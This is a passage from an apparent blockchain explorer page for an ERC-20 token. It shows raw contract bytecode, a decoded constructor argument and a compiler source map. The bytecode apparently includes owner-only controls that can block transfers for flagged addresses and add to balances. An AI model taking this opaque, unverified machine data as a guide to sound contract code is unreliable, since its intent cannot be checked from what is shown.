fffffffffffffffffffffffffffffffffff161415612180576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806129736023913960400191505060405180910390fd5b600081116121d9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526029815260200180612a496029913960400191505060405180910390fd5b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061227a5750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156122d157600081146122d0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526000815260200160200191505060405180910390fd5b5b61233d816040518060600160405280602681526020016129da60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506123d281600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461265990919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b600083831115829061252c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156124f15780820151818401526020810190506124d6565b50505050905090810190601f16801561251e5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b5060008385039050809150509392505050565b60008083141561255257600090506125bf565b600082840290508284828161256357fe5b04146125ba576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526021815260200180612a006021913960400191505060405180910390fd5b809150505b92915050565b600061260783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506128a7565b905092915050565b600061265183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061247f565b905092915050565b6000808284019050838110156126d7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612767576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526021815260200180612a726021913960400191505060405180910390fd5b6127738260008361296d565b6127df8160405180606001604052806022815260200161299660229139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461247f9092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506128378160075461260f90919063ffffffff16565b600781905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a35050565b60008083118290612953576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156129185780820151818401526020810190506128fd565b50505050905090810190601f1680156129455780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50600083858161295f57fe5b049050809150509392505050565b50505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f7745524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655472616e7366657220616d6f756e74206d7573742062652067726561746572207468616e207a65726f45524332303a206275726e2066726f6d20746865207a65726f206164647265737345524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ad36b78d0d555f9f587e603a3a6999117f438be18918e2c6be49b142ebca161c64736f6c63430006060033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000000000000000000000000000cdff97fabcb4600000
-----Decoded View---------------
Arg [0] : initialTokens (uint256): 3800000000000000000000
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000cdff97fabcb4600000
Deployed Bytecode Sourcemap
28482:467:0:-:0;;;;5:9:-1;2:2;;;27:1;24;17:12;2:2;28482:467:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12:1:-1;9;2:12;18146:83:0;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;18146:83:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;20552:169;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;20552:169:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;18604:309;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;18604:309:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;18492:100;;;:::i;:::-;;;;;;;;;;;;;;;;;;;17505:47;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;17505:47:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;18921:151;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;18921:151:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;21193:321;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;21193:321:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;24457:489;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;24457:489:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;18340:83;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;21921:218;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;21921:218:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;28865:81;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;28865:81:0;;;;;;;;;;;;;;;;;:::i;:::-;;23550:308;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;23550:308:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;17453:45;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;17453:45:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;19139:119;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;19139:119:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;23935:224;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;23935:224:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;18241:87;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;18241:87:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23273:214;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;23273:214:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;22640:269;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;22640:269:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;19475:720;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;19475:720:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;22951:86;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;22951:86:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;23088:114;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;23088:114:0;;;;;;;;;;;;;;;;;;;:::i;:::-;;17300:22;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;20256:151;;;;;;15:2:-1;10:3;7:11;4:2;;;31:1;28;21:12;4:2;20256:151:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;24209:150;;;:::i;:::-;;17624:34;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;18146:83;18183:13;18216:5;18209:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18146:83;:::o;20552:169::-;20635:4;20652:39;20661:12;:10;:12::i;:::-;20675:7;20684:6;20652:8;:39::i;:::-;20709:4;20702:11;;20552:169;;;;:::o;18604:309::-;14549:12;:10;:12::i;:::-;14539:22;;:6;;;;;;;;;;;:22;;;14531:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18752:4:::1;18701:55;;:23;:47;18725:22;18701:47;;;;;;;;;;;;;;;;;;;;;;;;;:55;;;18697:209;;;18823:5;18773:23;:47;18797:22;18773:47;;;;;;;;;;;;;;;;:55;;;;;;;;;;;;;;;;;;18697:209;;;18900:4;18850:23;:47;18874:22;18850:47;;;;;;;;;;;;;;;;:54;;;;;;;;;;;;;;;;;;18697:209;18604:309:::0;:::o;18492:100::-;18545:7;18572:12;;18565:19;;18492:100;:::o;17505:47::-;;;;;;;;;;;;;;;;;;;;;;:::o;18921:151::-;18993:4;19017:23;:47;19041:22;19017:47;;;;;;;;;;;;;;;;;;;;;;;;;19010:54;;18921:151;;;:::o;21193:321::-;21299:4;21316:36;21326:6;21334:9;21345:6;21316:9;:36::i;:::-;21363:121;21372:6;21380:12;:10;:12::i;:::-;21394:89;21432:6;21394:89;;;;;;;;;;;;;;;;;:11;:19;21406:6;21394:19;;;;;;;;;;;;;;;:33;21414:12;:10;:12::i;:::-;21394:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;21363:8;:121::i;:::-;21502:4;21495:11;;21193:321;;;;;:::o;24457:489::-;24568:24;24594:38;24710:13;:21;24724:6;24710:21;;;;;;;;;;;;;;;;;;;;;;;;;:51;;;;24735:15;:26;24751:9;24735:26;;;;;;;;;;;;;;;;;;;;;;;;;24710:51;24706:102;;;24786:6;24794:1;24778:18;;;;;;;;;24706:102;24857:11;24871:27;24893:4;24871:17;24882:5;;;;;;;;;;;24871:17;;:6;:10;;:17;;;;:::i;:::-;:21;;:27;;;;:::i;:::-;24857:41;;24917:15;24928:3;24917:6;:10;;:15;;;;:::i;:::-;24934:3;24909:29;;;;;24457:489;;;;;;;:::o;18340:83::-;18381:5;18406:9;;;;;;;;;;;18399:16;;18340:83;:::o;21921:218::-;22009:4;22026:83;22035:12;:10;:12::i;:::-;22049:7;22058:50;22097:10;22058:11;:25;22070:12;:10;:12::i;:::-;22058:25;;;;;;;;;;;;;;;:34;22084:7;22058:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;22026:8;:83::i;:::-;22127:4;22120:11;;21921:218;;;;:::o;28865:81::-;28913:25;28919:10;28931:6;28913:5;:25::i;:::-;28865:81;:::o;23550:308::-;14549:12;:10;:12::i;:::-;14539:22;;:6;;;;;;;;;;;:22;;;14531:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23680:1:::1;23653:29;;:15;:29;;;;23645:73;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;23758:40;23789:8;23758:9;:26;23768:15;23758:26;;;;;;;;;;;;;;;;:30;;:40;;;;:::i;:::-;23729:9;:26;23739:15;23729:26;;;;;;;;;;;;;;;:69;;;;23824:26;23841:8;23824:12;;:16;;:26;;;;:::i;:::-;23809:12;:41;;;;23550:308:::0;;:::o;17453:45::-;;;;;;;;;;;;;;;;;;;;;;:::o;19139:119::-;19205:7;19232:9;:18;19242:7;19232:18;;;;;;;;;;;;;;;;19225:25;;19139:119;;;:::o;23935:224::-;14549:12;:10;:12::i;:::-;14539:22;;:6;;;;;;;;;;;:22;;;14531:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;24035:8:::1;24034:9;:40;;;;24047:8;:27;;;;;24059:15;;;;;;;;;;;24047:27;24034:40;24026:76;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;24143:8;24113:15;:27;24129:10;24113:27;;;;;;;;;;;;;;;;:38;;;;;;;;;;;;;;;;;;23935:224:::0;;:::o;18241:87::-;18280:13;18313:7;18306:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18241:87;:::o;23273:214::-;14549:12;:10;:12::i;:::-;14539:22;;:6;;;;;;;;;;;:22;;;14531:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23368:8:::1;23367:9;:40;;;;23380:8;:27;;;;;23392:15;;;;;;;;;;;23380:27;23367:40;23359:76;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;23471:8;23446:13;:22;23460:7;23446:22;;;;;;;;;;;;;;;;:33;;;;;;;;;;;;;;;;;;23273:214:::0;;:::o;22640:269::-;22733:4;22750:129;22759:12;:10;:12::i;:::-;22773:7;22782:96;22821:15;22782:96;;;;;;;;;;;;;;;;;:11;:25;22794:12;:10;:12::i;:::-;22782:25;;;;;;;;;;;;;;;:34;22808:7;22782:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;22750:8;:129::i;:::-;22897:4;22890:11;;22640:269;;;;:::o;19475:720::-;19561:4;19610:1;19586:26;;:12;:10;:12::i;:::-;:26;;;;19578:76;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19694:1;19673:23;;:9;:23;;;;19665:71;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19764:1;19755:6;:10;19747:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19826:23;:37;19850:12;:10;:12::i;:::-;19826:37;;;;;;;;;;;;;;;;;;;;;;;;;:75;;;;19867:23;:34;19891:9;19867:34;;;;;;;;;;;;;;;;;;;;;;;;;19826:75;19822:106;;;19922:1;19912:6;:11;19903:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19822:106;19965:77;19993:6;19965:77;;;;;;;;;;;;;;;;;:9;:23;19975:12;:10;:12::i;:::-;19965:23;;;;;;;;;;;;;;;;:27;;:77;;;;;:::i;:::-;19939:9;:23;19949:12;:10;:12::i;:::-;19939:23;;;;;;;;;;;;;;;:103;;;;20076:32;20101:6;20076:9;:20;20086:9;20076:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;20053:9;:20;20063:9;20053:20;;;;;;;;;;;;;;;:55;;;;20147:9;20124:41;;20133:12;:10;:12::i;:::-;20124:41;;;20158:6;20124:41;;;;;;;;;;;;;;;;;;20183:4;20176:11;;19475:720;;;;:::o;22951:86::-;14549:12;:10;:12::i;:::-;14539:22;;:6;;;;;;;;;;;:22;;;14531:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23020:9:::1;23012:5;;:17;;;;;;;;;;;;;;;;;;22951:86:::0;:::o;23088:114::-;14549:12;:10;:12::i;:::-;14539:22;;:6;;;;;;;;;;;:22;;;14531:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23182:12:::1;23165:14;;:29;;;;;;;;;;;;;;;;;;23088:114:::0;:::o;17300:22::-;;;;;;;;;;;;;:::o;20256:151::-;20345:7;20372:11;:18;20384:5;20372:18;;;;;;;;;;;;;;;:27;20391:7;20372:27;;;;;;;;;;;;;;;;20365:34;;20256:151;;;;:::o;24209:150::-;14549:12;:10;:12::i;:::-;14539:22;;:6;;;;;;;;;;;:22;;;14531:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;24346:5:::1;24328:15;;:23;;;;;;;;;;;;;;;;;;24209:150::o:0;17624:34::-;;;;;;;;;;;;;:::o;95:106::-;148:15;183:10;176:17;;95:106;:::o;27281:346::-;27400:1;27383:19;;:5;:19;;;;27375:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27481:1;27462:21;;:7;:21;;;;27454:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27565:6;27535:11;:18;27547:5;27535:18;;;;;;;;;;;;;;;:27;27554:7;27535:27;;;;;;;;;;;;;;;:36;;;;27603:7;27587:32;;27596:5;27587:32;;;27612:6;27587:32;;;;;;;;;;;;;;;;;;27281:346;;;:::o;25434:663::-;25558:1;25540:20;;:6;:20;;;;25532:70;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25642:1;25621:23;;:9;:23;;;;25613:71;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25712:1;25703:6;:10;25695:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25774:23;:31;25798:6;25774:31;;;;;;;;;;;;;;;;;;;;;;;;;:69;;;;25809:23;:34;25833:9;25809:34;;;;;;;;;;;;;;;;;;;;;;;;;25774:69;25770:100;;;25864:1;25854:6;:11;25845:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25770:100;25901:71;25923:6;25901:71;;;;;;;;;;;;;;;;;:9;:17;25911:6;25901:17;;;;;;;;;;;;;;;;:21;;:71;;;;;:::i;:::-;25881:9;:17;25891:6;25881:17;;;;;;;;;;;;;;;:91;;;;26006:32;26031:6;26006:9;:20;26016:9;26006:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;25983:9;:20;25993:9;25983:20;;;;;;;;;;;;;;;:55;;;;26071:9;26054:35;;26063:6;26054:35;;;26082:6;26054:35;;;;;;;;;;;;;;;;;;25434:663;;;:::o;4374:190::-;4460:7;4493:1;4488;:6;;4496:12;4480:29;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;4480:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4520:9;4536:1;4532;:5;4520:17;;4555:1;4548:8;;;4374:190;;;;;:::o;4821:467::-;4879:7;5129:1;5124;:6;5120:47;;;5154:1;5147:8;;;;5120:47;5177:9;5193:1;5189;:5;5177:17;;5222:1;5217;5213;:5;;;;;;:10;5205:56;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5279:1;5272:8;;;4821:467;;;;;:::o;5762:132::-;5820:7;5847:39;5851:1;5854;5847:39;;;;;;;;;;;;;;;;;:3;:39::i;:::-;5840:46;;5762:132;;;;:::o;3937:136::-;3995:7;4022:43;4026:1;4029;4022:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4015:50;;3937:136;;;;:::o;3475:181::-;3533:7;3553:9;3569:1;3565;:5;3553:17;;3594:1;3589;:6;;3581:46;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3647:1;3640:8;;;3475:181;;;;:::o;26427:418::-;26530:1;26511:21;;:7;:21;;;;26503:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;26583:49;26604:7;26621:1;26625:6;26583:20;:49::i;:::-;26666:68;26689:6;26666:68;;;;;;;;;;;;;;;;;:9;:18;26676:7;26666:18;;;;;;;;;;;;;;;;:22;;:68;;;;;:::i;:::-;26645:9;:18;26655:7;26645:18;;;;;;;;;;;;;;;:89;;;;26760:24;26777:6;26760:12;;:16;;:24;;;;:::i;:::-;26745:12;:39;;;;26826:1;26800:37;;26809:7;26800:37;;;26830:6;26800:37;;;;;;;;;;;;;;;;;;26427:418;;:::o;6388:276::-;6474:7;6506:1;6502;:5;6509:12;6494:28;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;6494:28:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6533:9;6549:1;6545;:5;;;;;;6533:17;;6655:1;6648:8;;;6388:276;;;;;:::o;28383:92::-;;;;:::o
Swarm Source
ipfs://ad36b78d0d555f9f587e603a3a6999117f438be18918e2c6be49b142ebca161c
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.